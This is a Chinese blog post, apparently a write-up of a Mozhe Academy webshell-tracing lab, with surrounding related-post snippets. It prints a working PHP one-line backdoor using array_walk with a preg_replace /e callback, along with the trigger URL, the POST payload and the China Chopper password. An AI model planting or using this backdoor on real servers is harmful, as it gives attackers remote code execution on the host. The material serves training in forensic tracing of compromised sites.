墨者学院 - WebShell代码分析溯源(第8题)

最新推荐文章于 2022-06-10 12:11:43 发布
最新推荐文章于 2022-06-10 12:11:43 发布
阅读量712 收藏 1
点赞数
分类专栏: webshell Mozhe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42357070/article/details/81431338
版权

审查代码

1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码
2、没有新的发现,就去目录查找,根据最后的修改时间排查。

C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php

 

<?php
   error_reporting(0);
   $e = $_REQUEST['e'];
   $arr = array($_POST['joker'] => '|.*|e',);
   array_walk($arr, $e, '');
?>

用法: http://www.xxx.com/8.php?e=preg_replace

浏览器提交POST:joker=phpinfo();

菜刀连接用法: http://www.xxx.com/8.php?e=preg_replace

密码:joker

详解:这个后门可以在php5.3下使用,array_walk()函数对数组中的每个元素应用用户自定义函数。在函数中,数组的键名和键值是参数。至于我们为什幺要传一个preg_replace

最低0.47元/天 解锁文章
多崎巡礼
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-WebShell代码分析溯源(第8)
JimWu的博客
09-04 246
WebShell代码分析溯源(第8) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.审查php文件,根据修改时间,发现可疑文件。 3.打开文件,发现确实是一句话木马病毒文件。 |.*|e可以把匹配来的字符串当作正则表达式执行,配合preg_replace函数使用。 所以就可以执行pre...
墨者 - WebShell代码分析溯源(第8)
吃肉唐僧的博客
07-15 280
这是一道很坑的目......花了我两天时间才搞完 先上解思路 下载文件,根据目提示说注意修改时间 一个个查看,当查看到fields文件时 大部分时间为2016.10.30,注入木马的文件是隐蔽的不想被人发现的, 所以应该不会大范围的改动文件,2.12这个文件在10.30这个日期的前面应该不可能, 最后定位到cass-wp-rest-comment-meta-style....
墨者学院--Webshell代码分析溯源8
weixin_44382289的博客
09-20 114
1.下载源码,查找木马,还是那个意思分析代码,有意思的是目给的提示。 2.根据目体现,发现fields文件夹里第二个文件修改时间最特出,打开发现,该文件就是木马文件; 分析代码,使用array_walk函数,这让我想到了preg_replace函数;(有兴趣的可以去了解了解) 所以我在这使用e=preg_replace; 3.话不多说,上刀,密码:pass,成功! 4.打开key页,得到...
墨者学院 - WebShell代码分析溯源(第6)
多崎巡礼的博客
08-03 435
审查代码,在图片文件夹中有php(有毒) 使用了回调函数array_map(将用函数去执行每个参数,返回结果)、$_REQUEST、$_POST,通过分析, 类似于第五,用e来接受assert的base64加密的值作为函数,用POST作为密码 使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST,key文件在/var...
墨者学院--Webshell代码分析溯源1
weixin_44382289的博客
09-04 142
1.打开网站,被黑客通告;我们下载网站源码如下图; 2.寻找木马病毒,发现木马为cn-right.php文件 3.直接上刀,连接后发现key页,点击进去得到key
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害**:攻击者可以通过RCE漏洞执行任意命令,获取敏感信息,篡改数据,甚至完全控制服务器。 5. **修复**:最佳...
墨者 - PHP代码分析溯源(第3)
吃肉唐僧的博客
07-15 216
下载文件 分析代码:ord()为将字符串的第一个字节转换为0到255之间的值 需要传入与54975581388相等的值,而且不能传入1~9数字, 而==因为是弱类型会自动将16进制转换为10进制,所以直接 54975581388转十六进制0xccccccccc 即可拿到key ...
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 943
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
墨者学院 - SQL注入漏洞测试(POST)
多崎巡礼的博客
08-20 5338
和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显 根据目提示,post请求 1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt; 2)将txt放在sqlmap目录下; 3)打开sqlmap,使用post注入; sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名...
mozhe 投票常见漏洞分析溯源
ted_guangda的博客
06-10 997
mozhe 投票常见漏洞分析溯源
墨者学院 - WebShell代码分析溯源(第9)
多崎巡礼的博客
08-05 811
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。     &lt;?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']); ...
PHP代码分析溯源(第1)
mozhe_的博客
05-25 1638
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码,经分析:1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中...
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 810
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
【CTF bugku 备份是个好习惯】关于.bak备份文件,md5绕过
zw05011的博客
01-13 2951
知识点 常用的备份文件后缀有 .bak, .swp bak是备份文件的扩展名,现在很多软件都会创建备份文件,bak文件是各类软件产生的备份文件。打开bak文件的方法有简单,只需要知道它的生成软件,然后将后缀名改成生成格式的默认软件就可以了。一般把.bak文件直接重命名替换成该文件的格式就可以恢复此文件并正常打开了,如当cad 文件被误删或无法打开时你只需要把bak文件的后缀名改为dwg就可以恢复了,Office文件也是一样。但如果不知道bak文件什么程序产生的,可以利 用WINHEX按二进制文件打开,
墨者学院 - WebShell代码分析溯源(第1)
多崎巡礼的博客
07-27 1251
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   &lt;?php error_reporting(0); $_GET['POST']($_POST['GET']); ?&gt; ...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值